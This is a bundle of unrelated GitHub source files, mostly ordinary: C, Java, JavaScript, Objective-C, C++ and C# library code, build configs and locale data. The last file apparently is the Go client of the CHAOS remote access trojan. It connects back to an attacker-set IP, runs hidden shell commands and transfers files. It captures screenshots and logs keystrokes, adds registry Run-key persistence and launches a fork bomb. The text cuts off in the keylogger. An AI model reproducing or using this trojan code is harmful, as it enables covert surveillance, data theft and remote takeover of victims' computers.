int x, int y) { throw new UnsupportedOperationException(); } @Override public SVGImage replace(Float[] target, Float[] replacement) { throw new UnsupportedOperationException(); } }
{ "pile_set_name": "Github" }
#ifndef __HIREDIS_LIBUV_H__ #define __HIREDIS_LIBUV_H__ #include <uv.h> #include "../hiredis.h" #include "../async.h" #include <string.h> typedef struct redisLibuvEvents { redisAsyncContext* context; uv_poll_t handle; int events; } redisLibuvEvents; int redisLibuvAttach(redisAsyncContext*, uv_loop_t*); static void redisLibuvPoll(uv_poll_t* handle, int status, int events) { redisLibuvEvents* p = (redisLibuvEvents*)handle->data; if (status != 0) { return; } if (events & UV_READABLE) { redisAsyncHandleRead(p->context); } if (events & UV_WRITABLE) { redisAsyncHandleWrite(p->context); } } static void redisLibuvAddRead(void *privdata) { redisLibuvEvents* p = (redisLibuvEvents*)privdata; p->events |= UV_READABLE; uv_poll_start(&p->handle, p->events, redisLibuvPoll); } static void redisLibuvDelRead(void *privdata) { redisLibuvEvents* p = (redisLibuvEvents*)privdata; p->events &= ~UV_READABLE; if (p->events) { uv_poll_start(&p->handle, p->events, redisLibuvPoll); } else { uv_poll_stop(&p->handle); } } static void redisLibuvAddWrite(void *privdata) { redisLibuvEvents* p = (redisLibuvEvents*)privdata; p->events |= UV_WRITABLE; uv_poll_start(&p->handle, p->events, redisLibuvPoll); } static void redisLibuvDelWrite(void *privdata) { redisLibuvEvents* p = (redisLibuvEvents*)privdata; p->events &= ~UV_WRITABLE; if (p->events) { uv_poll_start(&p->handle, p->events, redisLibuvPoll); } else { uv_poll_stop(&p->handle); } } static void on_close(uv_handle_t* handle) { redisLibuvEvents* p = (redisLibuvEvents*)handle->data; free(p); } static void redisLibuvCleanup(void *privdata) { redisLibuvEvents* p = (redisLibuvEvents*)privdata; uv_close((uv_handle_t*)&p->handle, on_close); } static int redisLibuvAttach(redisAsyncContext* ac, uv_loop_t* loop) { redisContext *c = &(ac->c); if (ac->ev.data != NULL) { return REDIS_ERR; } ac->ev.addRead = redisLibuvAddRead; ac->ev.delRead = redisLibuvDelRead; ac->ev.addWrite = redisLibuvAddWrite; ac->ev.delWrite = redisLibuvDelWrite; ac->ev.cleanup = redisLibuvCleanup; redisLibuvEvents* p = (redisLibuvEvents*)malloc(sizeof(*p)); if (!p) { return REDIS_ERR; } memset(p, 0, sizeof(*p)); if (uv_poll_init(loop, &p->handle, c->fd) != 0) { return REDIS_ERR; } ac->ev.data = p; p->handle.data = p; p->context = ac; return REDIS_OK; } #endif
{ "pile_set_name": "Github" }
/* * Copyright (c) 2008-2020, Hazelcast, Inc. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.hazelcast.internal.crdt; import com.hazelcast.cluster.impl.VectorClock; import com.hazelcast.config.CRDTReplicationConfig; import com.hazelcast.cluster.Member; import com.hazelcast.logging.ILogger; import com.hazelcast.spi.impl.NodeEngine; import com.hazelcast.spi.impl.operationservice.OperationService; import java.util.ArrayList; import java.util.Collection; import java.util.List; import java.util.Map; import static com.hazelcast.cluster.memberselector.MemberSelectors.DATA_MEMBER_SELECTOR; /** * Task responsible for replicating the CRDT states for all * {@link CRDTReplicationAwareService}. This task is a runnable that is * meant to be executed by an executor. The task may be interrupted in * which case some CRDT states may not be replicated. */ class CRDTReplicationTask implements Runnable { private final NodeEngine nodeEngine; private final int maxTargets; private final ILogger logger; private final CRDTReplicationMigrationService replicationMigrationService; private int lastTargetIndex; CRDTReplicationTask(NodeEngine nodeEngine, int maxTargets, CRDTReplicationMigrationService replicationMigrationService) { this.nodeEngine = nodeEngine; this.logger = nodeEngine.getLogger(getClass()); this.maxTargets = maxTargets; this.replicationMigrationService = replicationMigrationService; } @Override public void run() { if (nodeEngine.getLocalMember().isLiteMember()) { return; } try { final Collection<Member> viableTargets = getNonLocalReplicaAddresses(); if (viableTargets.size() == 0) { return; } final Member[] targets = pickTargets(viableTargets, lastTargetIndex, maxTargets); lastTargetIndex = (lastTargetIndex + targets.length) % viableTargets.size(); for (CRDTReplicationAwareService service : replicationMigrationService.getReplicationServices()) { for (Member target : targets) { replicate(service, target); } } } finally { // we left the interrupt status unchanged while replicating so we clear it here Thread.interrupted(); } } /** * Return the list of non-local CRDT replicas in the cluster. */ private List<Member> getNonLocalReplicaAddresses() { final Collection<Member> dataMembers = nodeEngine.getClusterService().getMembers(DATA_MEMBER_SELECTOR); final ArrayList<Member> nonLocalDataMembers = new ArrayList<Member>(dataMembers); nonLocalDataMembers.remove(nodeEngine.getLocalMember()); return nonLocalDataMembers; } /** * Performs replication of a {@link CRDTReplicationAwareService} to the * given target. The service may optimise the returned operation based on * the target member and the previous successful replication operations. * * @param service the service to replicate * @param target the target to replicate to * @see CRDTReplicationAwareService */ private void replicate(CRDTReplicationAwareService service, Member target) { if (Thread.currentThread().isInterrupted()) { return; } final int targetIndex = getDataMemberListIndex(target); final Map<String, VectorClock> lastSuccessfullyReplicatedClocks = replicationMigrationService.getReplicatedVectorClocks(service.getName(), target.getUuid()); final OperationService operationService = nodeEngine.getOperationService(); final CRDTReplicationContainer replicationOperation = service.prepareReplicationOperation(lastSuccessfullyReplicatedClocks, targetIndex); if (replicationOperation == null) { logger.finest("Skipping replication of " + service.getName() + " for target " + target); return; } try { logger.finest("Replicating " + service.getName() + " to " + target); operationService.invokeOnTarget(null, replicationOperation.getOperation(), target.getAddress()).joinInternal(); replicationMigrationService.setReplicatedVectorClocks(service.getName(), target.getUuid(), replicationOperation.getVectorClocks()); } catch (Exception e) { if (logger.isFineEnabled()) { logger.fine("Failed replication of " + service.getName() + " for target " + target, e); } else { logger.info("Failed replication of " + service.getName() + " for target " + target); } } } /** * Returns the index of the {@code member} in the membership list containing * only data members. * * @param member the member to find */ private int getDataMemberListIndex(Member member) { final Collection<Member> dataMembers = nodeEngine.getClusterService().getMembers(DATA_MEMBER_SELECTOR); int index = -1; for (Member dataMember : dataMembers) { index++; if (dataMember.equals(member)) { return index; } } return index; } /** * Picks up to {@code maxTargets} from the provided {@code members} * collection. The {@code startingIndex} parameter determines which * subset of members can be returned. By increasing the parameter by the * size of the returned array you can imitate a "sliding window", meaning * that each time it is invoked it will rotate through a list of viable * targets and return a sub-collection based on the previous method call. * A member may be skipped if the collection of viable targets changes * between two invocations but if the collection does not change, * eventually all targets should be returned by this method. * * @param members a collection of members to choose from * @param startingIndex the index of the first returned member * @param maxTargets the maximum number of members to return * @return the chosen targets * @see CRDTReplicationConfig#getMaxConcurrentReplicationTargets() */ private Member[] pickTargets(Collection<Member> members, int startingIndex, int maxTargets) { final Member[] viableTargetArray = members.toArray(new Member[0]); final Member[] pickedTargets = new Member[Math.min(maxTargets, viableTargetArray.length)]; for (int i = 0; i < pickedTargets.length; i++) { startingIndex = (startingIndex + 1) % viableTargetArray.length; pickedTargets[i] = viableTargetArray[startingIndex]; } return pickedTargets; } }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8" ?> <phpdox xmlns="http://xml.phpdox.net/config"> <project name="PHPUnit" source="src" workdir="build/phpdox"> <collector publiconly="false"> <include mask="*.php" /> </collector> <generator output="build"> <enrich base="${basedir}/build/logs"> <source type="build" /> <source type="git" /> <source type="phploc" /> <source type="checkstyle" /> <source type="pmd" /> </enrich> <build engine="html" enabled="true" output="api"> <file extension="html" /> </build> </generator> </project> </phpdox>
{ "pile_set_name": "Github" }
--- linux-2.6.32/include/scsi/Kbuild +++ linux-2.6.32/include/scsi/Kbuild @@ -1,3 +1,5 @@ +header-y += sg.h +header-y += scsi_ioctl.h header-y += scsi.h header-y += scsi_netlink.h header-y += scsi_netlink_fc.h
{ "pile_set_name": "Github" }
var CipherBase = require('cipher-base') var des = require('des.js') var inherits = require('inherits') var modes = { 'des-ede3-cbc': des.CBC.instantiate(des.EDE), 'des-ede3': des.EDE, 'des-ede-cbc': des.CBC.instantiate(des.EDE), 'des-ede': des.EDE, 'des-cbc': des.CBC.instantiate(des.DES), 'des-ecb': des.DES } modes.des = modes['des-cbc'] modes.des3 = modes['des-ede3-cbc'] module.exports = DES inherits(DES, CipherBase) function DES (opts) { CipherBase.call(this) var modeName = opts.mode.toLowerCase() var mode = modes[modeName] var type if (opts.decrypt) { type = 'decrypt' } else { type = 'encrypt' } var key = opts.key if (modeName === 'des-ede' || modeName === 'des-ede-cbc') { key = Buffer.concat([key, key.slice(0, 8)]) } var iv = opts.iv this._des = mode.create({ key: key, iv: iv, type: type }) } DES.prototype._update = function (data) { return new Buffer(this._des.update(data)) } DES.prototype._final = function () { return new Buffer(this._des.final()) }
{ "pile_set_name": "Github" }
<component name="ProjectRunConfigurationManager"> <configuration default="false" name="OperaProxyTest" type="JUnit" factoryName="JUnit"> <extension name="coverage" enabled="false" merge="false" sample_coverage="true" runner="idea" /> <module name="Webdriver-opera" /> <option name="ALTERNATIVE_JRE_PATH_ENABLED" value="false" /> <option name="ALTERNATIVE_JRE_PATH" value="" /> <option name="PACKAGE_NAME" value="com.opera.core.systems" /> <option name="MAIN_CLASS_NAME" value="com.opera.core.systems.OperaProxyTest" /> <option name="METHOD_NAME" value="" /> <option name="TEST_OBJECT" value="class" /> <option name="VM_PARAMETERS" value="-ea" /> <option name="PARAMETERS" value="" /> <option name="WORKING_DIRECTORY" value="file://$PROJECT_DIR$" /> <option name="ENV_VARIABLES" /> <option name="PASS_PARENT_ENVS" value="true" /> <option name="TEST_SEARCH_SCOPE"> <value defaultName="moduleWithDependencies" /> </option> <envs /> <patterns /> <method /> </configuration> </component>
{ "pile_set_name": "Github" }
import { Api } from '../toolbox'; export const fetchArtists = () => { return dispatch => { return Api.fetchArtists() .then(artists => { // The albums of each artist const artistData = {}; for (let i in artists) { const artist = artists[i].artist; artistData[artist] = []; } dispatch({ type: 'FETCH_ARTIST_LIST_SUCCESS', artists, artistData, }); }) .catch(error => { console.log(error); }); }; }; export const fetchArtist = artist => { return dispatch => { return Api.fetchArtist(artist) .then(albums => { const albumData = {}; for (let i in albums) { const album = albums[i]; albumData[album.album] = []; } dispatch({ type: 'FETCH_ARTIST_SUCCESS', name: artist, albums, albumData, }); }) .catch(error => { console.log(error); }); }; }; export const fetchAlbums = () => { return dispatch => { return Api.fetchAlbums() .then(albums => { const albumData = {}; for (let album of albums) { const name = album.album; albumData[name] = []; } dispatch({ type: 'FETCH_ALBUM_LIST_SUCCESS', albumData, albums, }); }) .catch(error => { console.log(error); }); }; }; export const fetchAlbum = ({ artist, album }) => { return dispatch => { return Api.fetchAlbum({ artist, album }) .then(tracks => { dispatch({ type: 'FETCH_ALBUM_SUCCESS', album, tracks, }); }) .catch(error => { console.log(error); }); }; }; export const fetchPlaylists = () => { return dispatch => { const playlists = localStorage.appleMusicPlaylists; dispatch({ type: 'FETCH_PLAYLIST_LIST_SUCCESS', playlists: playlists ? JSON.parse(playlists) : [], }); }; }; export const createPlaylist = playlist => { return dispatch => { let playlists = localStorage.appleMusicPlaylists ? JSON.parse(localStorage.appleMusicPlaylists) : {}; playlists[playlist.title] = playlist; localStorage.appleMusicPlaylists = JSON.stringify(playlists); dispatch({ type: 'CREATE_PLAYLIST', playlists, }); }; }; export const addToPlaylist = (track, playlist) => { return dispatch => { let playlists = localStorage.appleMusicPlaylists; playlists = playlists ? JSON.parse(playlists) : playlists; // Add track to playlist playlist = { ...playlist, tracks: [...playlist.tracks, track], }; // Update playlist in playlist list playlists = { ...playlists, [playlist.title]: playlist, }; localStorage.appleMusicPlaylists = JSON.stringify(playlists); dispatch({ type: 'UPDATE_PLAYLIST', playlists, }); }; }; export const removeFromPlaylist = (index, playlist) => { return dispatch => { let playlists = localStorage.appleMusicPlaylists; playlists = playlists ? JSON.parse(playlists) : playlists; playlist = { ...playlist, tracks: [ ...playlist.tracks.slice(0, index), ...playlist.tracks.slice(index + 1), ], }; // Update playlist in playlist list playlists = { ...playlists, [playlist.title]: playlist, }; localStorage.appleMusicPlaylists = JSON.stringify(playlists); dispatch({ type: 'UPDATE_PLAYLIST', playlists, }); }; }; export const deletePlaylist = playlist => { return dispatch => { let playlists = localStorage.appleMusicPlaylists; playlists = playlists ? JSON.parse(playlists) : playlists; delete playlists[playlist.title]; localStorage.appleMusicPlaylists = JSON.stringify(playlists); dispatch({ type: 'UPDATE_PLAYLIST', playlists, }); }; };
{ "pile_set_name": "Github" }
// // Generated by class-dump 3.5 (64 bit). // // class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard. // #import "MMService.h" #import "IMsgExt.h" #import "MMImageLoaderObserver.h" #import "MMService.h" @class GameCenterMsgDb, NSString; @interface GameCenterMsgMgr : MMService <MMService, IMsgExt, MMImageLoaderObserver> { _Bool shouldClearDb; _Bool shouldClearNotify; GameCenterMsgDb *_db; } @property(retain, nonatomic) GameCenterMsgDb *db; // @synthesize db=_db; - (void).cxx_destruct; - (void)statMsgReceived:(id)arg1; - (_Bool)clearMsgDb:(id)arg1; - (void)clearMsgList; - (void)clearAllRedDot; - (id)getMsgDbModelList; - (id)getMsgDbModelByLocalId:(unsigned int)arg1; - (void)ImageDidLoadWithData:(id)arg1 Url:(id)arg2; - (void)ImageDidFail:(id)arg1; - (_Bool)isEntryIconDownloading:(unsigned int)arg1; - (_Bool)downloadEntryIconIfNeed:(id)arg1; - (_Bool)urlSameWithFindFriendEntry:(id)arg1 DownloadTime:(int *)arg2 LocalId:(unsigned int *)arg3; - (void)onServiceReloadData; - (void)onServiceClearData; - (void)onServiceTerminate; - (void)onServiceEnterForeground; - (void)onServiceEnterBackground; - (void)onServiceInit; - (int)getDownloadTime:(unsigned int)arg1; - (_Bool)setDownloadTime:(unsigned int)arg1 DownloadTime:(int)arg2; - (id)getDownloadTimeKey:(unsigned int)arg1; - (_Bool)setKeyAtPosition:(id)arg1 Value:(unsigned int)arg2; - (_Bool)clearKeyAtPosition:(id)arg1; - (unsigned int)getKeyAtPosition:(id)arg1; - (id)getMsgWithLocalId:(unsigned int)arg1; - (id)getNotifyWithKey:(id)arg1; - (_Bool)canClearMsgNotify:(unsigned int)arg1; - (_Bool)underWeakNetStrategy:(id)arg1; - (_Bool)deleteMsgBeforeTimeStamp:(unsigned int)arg1; - (_Bool)deleteMsgByLocalId:(int)arg1; - (_Bool)deleteAllMsg; - (_Bool)setMsgCenterAllRead; - (id)getMsgCenterListForJsApi:(int)arg1 lastLocalId:(int)arg2 onlyUnRead:(_Bool)arg3 maxCount:(int)arg4; - (id)getMsgCenterList:(int)arg1 maxCount:(int)arg2; - (id)getMsgCenterReadListBefore:(unsigned int)arg1; - (id)getMsgCenterUnreadList; - (_Bool)clearGameCenterGiftRedDot; - (_Bool)clearGameCenterMsgCenterAllRedDot; - (_Bool)clearGameCenterH5FloatLayer:(unsigned int)arg1; - (_Bool)clearGameCenterBubble:(unsigned int)arg1; - (_Bool)clearFindFriendEntry; - (unsigned int)getLastMsgKey; - (id)getGameCenterGiftRedDot; - (id)getGameCenterMsgCenterRedDot; - (id)getGameCenterH5FloatLayer; - (id)getGameCenterBubble; - (id)getFindFriendEntryNotify; - (_Bool)coverNotify:(id)arg1; - (_Bool)shouldCoverNotify:(id)arg1; - (_Bool)appendUserInfoToMsg:(id)arg1 WithXmlSection:(id)arg2; - (_Bool)replaceJumpInfoSection:(id)arg1 JumpInfoSection:(id)arg2; - (_Bool)refreshJumpInfoXmlSection:(id)arg1; - (_Bool)mergeJumpInfo:(id)arg1 JumpInfoDic:(id)arg2; - (_Bool)mergeUserInfo:(id)arg1 DbMsg:(id)arg2 UserJumpInfoDic:(id)arg3; - (void)filterUserInfoList:(id)arg1 DbMsg:(id)arg2; - (_Bool)mergeOriginXmlFromDB:(id)arg1; - (unsigned int)saveMsg:(id)arg1; - (void)OnGetNewXmlMsg:(id)arg1 Type:(id)arg2 MsgWrap:(id)arg3; - (void)dealloc; - (id)init; // Remaining properties @property(readonly, copy) NSString *debugDescription; @property(readonly, copy) NSString *description; @property(readonly) unsigned long long hash; @property(readonly) Class superclass; @end
{ "pile_set_name": "Github" }
// OpenNN: Open Neural Networks Library // www.opennn.net // // L E U K E M I A A P P L I C A T I O N // // Artificial Intelligence Techniques, S.L. (Artelnics) // [email protected] // This is a classical pattern recognition problem. // System includes #include <iostream> #include <fstream> #include <sstream> #include <string> #include <cstring> #include <time.h> #include <omp.h> // OpenNN includes #include "../../opennn/opennn.h" using namespace OpenNN; int main(void) { try { cout << "OpenNN. Leukemia Example." << endl; // Device const int n = omp_get_max_threads(); NonBlockingThreadPool* non_blocking_thread_pool = new NonBlockingThreadPool(n); ThreadPoolDevice* thread_pool_device = new ThreadPoolDevice(non_blocking_thread_pool, n); DataSet data_set("../data/leukemia.csv",';',false); data_set.set_thread_pool_device(thread_pool_device); data_set.set_training(); Tensor<Index, 1> input_variables_indices = data_set.get_input_variables_indices(); Tensor<Index, 1> target_variables_indices = data_set.get_target_variables_indices(); #pragma omp parallel for for(int i=0; i<input_variables_indices.dimension(0); i++) { CorrelationResults logistic_correlation = logistic_correlations(thread_pool_device, data_set.get_data().chip(input_variables_indices(i),1), data_set.get_data().chip(target_variables_indices(0),1)); CorrelationResults gauss_correlation = gauss_correlations(thread_pool_device, data_set.get_data().chip(input_variables_indices(i),1), data_set.get_data().chip(target_variables_indices(0),1)); if(abs(logistic_correlation.correlation) > abs(gauss_correlation.correlation) && abs(logistic_correlation.correlation) > 0.9) { cout << "Gen: " << i << endl; cout << "Logistic correlation: " << logistic_correlation.correlation << endl; } if(abs(gauss_correlation.correlation) > abs(logistic_correlation.correlation) && abs(gauss_correlation.correlation) > 0.9) { cout<<"Gen: "<<i<<endl; cout<<"Gauss correlation: "<<gauss_correlation.correlation<<endl; } if(i%250 == 0) { cout<<static_cast<float>(i)/static_cast<float>(input_variables_indices.dimension(0))*100 <<"% dataset evaluated"<<endl; } } return 0; } catch(exception& e) { cerr << e.what() << endl; return 1; } } // OpenNN: Open Neural Networks Library. // Copyright (C) 2005-2019 Artificial Intelligence Techniques SL // // This library is free software; you can redistribute it and/or // modify it under the terms of the GNU Lesser General Public // License as published by the Free Software Foundation; either // version 2.1 of the License, or any later version. // // This library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU // Lesser General Public License for more details. // You should have received a copy of the GNU Lesser General Public // License along with this library; if not, write to the Free Software // Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
{ "pile_set_name": "Github" }
{ "az_Cyrl_AZ": { "datetime": { "abbr_day_names": [ "B.", "B.E.", "Ç.A.", "Ç.", "C.A.", "C", "Ş." ], "abbr_month_names": [ "yan", "fev", "mar", "apr", "may", "iyn", "iyl", "avq", "sen", "okt", "noy", "dek" ], "day_names": [ "bazar", "bazar ertəsi", "çərşənbə axşamı", "çərşənbə", "cümə axşamı", "cümə", "şənbə" ], "format": "%d %B, %Y", "month_names": [ "yanvar", "fevral", "mart", "aprel", "may", "iyun", "iyul", "avqust", "sentyabr", "oktyabr", "noyabr", "dekabr" ] } } }
{ "pile_set_name": "Github" }
>>compile A.scala >>compile A.scala
{ "pile_set_name": "Github" }
/* Copyright (c) 2010 Michael Lidgren Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ using System; using System.Diagnostics.CodeAnalysis; namespace Lidgren.Network { /// <summary> /// The type of a NetIncomingMessage /// </summary> [SuppressMessage("Microsoft.Design", "CA1027:MarkEnumsWithFlags")] public enum NetIncomingMessageType { // // library note: values are power-of-two, but they are not flags - it's a convenience for NetPeerConfiguration.DisabledMessageTypes // /// <summary> /// Error; this value should never appear /// </summary> Error = 0, /// <summary> /// Status for a connection changed /// </summary> StatusChanged = 1 << 0, // Data (string) /// <summary> /// Data sent using SendUnconnectedMessage /// </summary> UnconnectedData = 1 << 1, // Data Based on data received /// <summary> /// Connection approval is needed /// </summary> ConnectionApproval = 1 << 2, // Data /// <summary> /// Application data /// </summary> Data = 1 << 3, // Data Based on data received /// <summary> /// Receipt of delivery /// </summary> Receipt = 1 << 4, // Data /// <summary> /// Discovery request for a response /// </summary> DiscoveryRequest = 1 << 5, // (no data) /// <summary> /// Discovery response to a request /// </summary> DiscoveryResponse = 1 << 6, // Data /// <summary> /// Verbose debug message /// </summary> VerboseDebugMessage = 1 << 7, // Data (string) /// <summary> /// Debug message /// </summary> DebugMessage = 1 << 8, // Data (string) /// <summary> /// Warning message /// </summary> WarningMessage = 1 << 9, // Data (string) /// <summary> /// Error message /// </summary> ErrorMessage = 1 << 10, // Data (string) /// <summary> /// NAT introduction was successful /// </summary> NatIntroductionSuccess = 1 << 11, // Data (as passed to master server) /// <summary> /// A roundtrip was measured and NetConnection.AverageRoundtripTime was updated /// </summary> ConnectionLatencyUpdated = 1 << 12, // Seconds as a Single } }
{ "pile_set_name": "Github" }
/*============================================================================= Copyright (c) 1998-2003 Joel de Guzman Copyright (c) 2001-2003 Hartmut Kaiser http://spirit.sourceforge.net/ Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) =============================================================================*/ #if !defined(BOOST_SPIRIT_META_MAIN_HPP) #define BOOST_SPIRIT_META_MAIN_HPP #include <boost/spirit/home/classic/version.hpp> /////////////////////////////////////////////////////////////////////////////// // // Master header for Spirit.Meta // /////////////////////////////////////////////////////////////////////////////// #include <boost/spirit/home/classic/meta/fundamental.hpp> #include <boost/spirit/home/classic/meta/parser_traits.hpp> #include <boost/spirit/home/classic/meta/as_parser.hpp> #include <boost/spirit/home/classic/meta/traverse.hpp> #endif // BOOST_SPIRIT_CORE_MAIN_HPP
{ "pile_set_name": "Github" }
package main import ( "bufio" "encoding/base64" "image/png" "io/ioutil" "log" "net" "os" "os/exec" "strconv" "syscall" "time" screenshot "github.com/kbinani/screenshot" goInfo "github.com/matishsiao/goInfo" ) const ( IP = "IPAddress:ServerPort" FILENAME = "FileNameCHAOS" FOLDER_PATH = "\\ProgramData" FOLDER_EXT = "\\NameFolderExtesion" NEW_LINE string = "\n" ) var ( dll, _ = syscall.LoadDLL("user32.dll") GetAsyncKeyState, _ = dll.FindProc("GetAsyncKeyState") GetKeyState, _ = dll.FindProc("GetKeyState") Logs string ) func main() { for { Connect() } } func Connect() { // Create a connection conn, err := net.Dial("tcp", IP) // If don't exist a connection created than try connect to a new if err != nil { log.Println("[*] Connecting...") for { Connect() } } for { // When the command received aren't encoded, // skip switch, and be executed on OS shell. command, _ := bufio.NewReader(conn).ReadString('\n') // log.Println(command) // When the command received are encoded, // decode message received, and test on switch decodedCommand, _ := base64.StdEncoding.DecodeString(command) // log.Println(decodedCommand) switch string(decodedCommand) { case "back": conn.Close() Connect() case "exit": conn.Close() os.Exit(0) case "screenshot": SendMessage(conn, EncodeBytesToString(TakeScreenShot())) RemoveNewLineCharFromConnection(conn) case "keylogger_start": go Keylogger() // Run a go routine for Keylogger function SendMessage(conn, " [i] Keylogger Listening!") RemoveNewLineCharFromConnection(conn) case "keylogger_show": SendMessage(conn, Logs) RemoveNewLineCharFromConnection(conn) case "download": pathDownload := ReceiveMessageStdEncoding(conn) file, err := ioutil.ReadFile(string(pathDownload)) if err != nil { conn.Write([]byte("[!] File not found!" + "\n")) } SendMessage(conn, string(file)) RemoveNewLineCharFromConnection(conn) case "upload": uploadInput := ReceiveMessageStdEncoding(conn) decUpload := ReceiveMessageURLEncoding(conn) if string(decUpload) != "" { ioutil.WriteFile(string(uploadInput), []byte(decUpload), 777) } case "getos": SendMessage(conn, GetOSInformation()) RemoveNewLineCharFromConnection(conn) case "lockscreen": log.Println(RunCmdReturnByte("rundll32.exe user32.dll,LockWorkStation")) SendMessage(conn, "[i] Locked!") RemoveNewLineCharFromConnection(conn) case "ls": SendMessage(conn, EncodeBytesToString(RunCmdReturnByte("dir"))) RemoveNewLineCharFromConnection(conn) case "persistence_enable": // Create a folder to save file os.MkdirAll(os.Getenv("systemdrive")+FOLDER_PATH+FOLDER_EXT, 0777) // Copy file to install path RunCmd("xcopy /Y " + FILENAME + " " + os.Getenv("systemdrive") + FOLDER_PATH + FOLDER_EXT) // Generate a .reg to install at startup CreateFile(os.Getenv("systemdrive")+FOLDER_PATH+FOLDER_EXT+"\\reg.bat", "REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V \"CHAOS Startup\" /t REG_SZ /F /D "+"\""+"%systemdrive%"+FOLDER_PATH+FOLDER_EXT+"\\"+FILENAME+"\"") // Run .bat to install RunCmd(os.Getenv("systemdrive") + FOLDER_PATH + FOLDER_EXT + "\\reg.bat") // Check if file is created file := os.Getenv("systemdrive") + FOLDER_PATH + FOLDER_EXT + "\\" + FILENAME _, err := os.Stat(file) if err == nil { SendMessage(conn, "[*] Persistence Enabled!") } else if os.IsNotExist(err) { SendMessage(conn, "[!] Persistence Failed!") } RemoveNewLineCharFromConnection(conn) case "persistence_disable": // Remove directory os.RemoveAll(os.Getenv("systemdrive") + FOLDER_PATH + FOLDER_EXT) // Create a .reg to remove at startup CreateFile(os.Getenv("systemdrive")+FOLDER_PATH+"\\reg.bat", "REG DELETE HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V \"CHAOS Startup\" /F") // Run .bat to remove RunCmd(os.Getenv("systemdrive") + FOLDER_PATH + "\\reg.bat") SendMessage(conn, "[*] Persistence Disabled!") RemoveNewLineCharFromConnection(conn) case "bomb": // Create a file to run fork bomb CreateFile(os.Getenv("systemdrive")+FOLDER_PATH+"\\bomb.bat", "%0|%0") // Run file RunCmd(os.Getenv("systemdrive") + FOLDER_PATH + "\\bomb.bat && del " + os.Getenv("systemdrive") + FOLDER_PATH + "\\bomb.bat") SendMessage(conn, "[*] Executed Fork Bomb!") RemoveNewLineCharFromConnection(conn) case "openurl": // Receive url and run it url := ReceiveMessageStdEncoding(conn) RunCmd("start " + url) SendMessage(conn, "[*] Opened!") RemoveNewLineCharFromConnection(conn) } // end switch SendMessage(conn, RunCmdReturnString(command)) _, err := conn.Read(make([]byte, 0)) if err != nil { Connect() } } } func SendMessage(conn net.Conn, message string) { conn.Write([]byte(base64.URLEncoding.EncodeToString([]byte(message)) + NEW_LINE)) } func ReceiveMessageStdEncoding(conn net.Conn) string { message, _ := bufio.NewReader(conn).ReadString('\n') messageDecoded, _ := base64.StdEncoding.DecodeString(message) return string(messageDecoded) } func ReceiveMessageURLEncoding(conn net.Conn) string { message, _ := bufio.NewReader(conn).ReadString('\n') messageDecoded, _ := base64.URLEncoding.DecodeString(message) return string(messageDecoded) } func EncodeBytesToString(value []byte) string { return base64.URLEncoding.EncodeToString(value) } func RemoveNewLineCharFromConnection(conn net.Conn) { newLineChar, _ := bufio.NewReader(conn).ReadString('\n') log.Println(newLineChar) } func RunCmdReturnByte(cmd string) []byte { cmdExec := exec.Command("cmd", "/C", cmd) cmdExec.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} c, _ := cmdExec.Output() return c } func RunCmdReturnString(cmd string) string { cmdExec := exec.Command("cmd", "/C", cmd) cmdExec.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} c, _ := cmdExec.Output() return string(c) } func RunCmd(cmd string) { cmdExec := exec.Command("cmd", "/C", cmd) cmdExec.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} c, _ := cmdExec.Output() log.Println(c) } func CreateFile(path string, text string) { create, _ := os.Create(path) create.WriteString(text) create.Close() } func TakeScreenShot() []byte { // Create a path to save screenshto pathToSaveScreenshot := os.Getenv("systemdrive") + FOLDER_PATH + "\\screenshot.png" // Run func to get screenshot n := screenshot.NumActiveDisplays() for i := 0; i < n; i++ { bounds := screenshot.GetDisplayBounds(i) img, err := screenshot.CaptureRect(bounds) if err != nil { Connect() } file, _ := os.Create(pathToSaveScreenshot) defer file.Close() png.Encode(file, img) } // end func to get screenshot // Read screenshot file file, err := ioutil.ReadFile(pathToSaveScreenshot) if err != nil { return nil } return file } func GetOSInformation() string { gi := goInfo.GetInfo() osInformation := "GoOS: " + gi.GoOS osInformation += "\n" + " Kernel: " + gi.Kernel osInformation += "\n" + " Core: " + gi.Core osInformation += "\n" + " Platform: " + gi.Platform osInformation += "\n" + " OS: " + gi.OS osInformation += "\n" + " Hostname: " + gi.Hostname osInformation += "\n" + " CPUs: " + strconv.Itoa(gi.CPUs) return osInformation } // It is just a poor implementation of a keylogger written in golang func Keylogger() { for { time.Sleep(1 * time.Millisecond) for i := 0; i < 256; i++ { Result, _, _ := GetAsyncKeyState.Call(uintptr(i)) if Result&0x1 == 0 { continue } switch i { case 8: Logs += "[Backspace]" case 9: 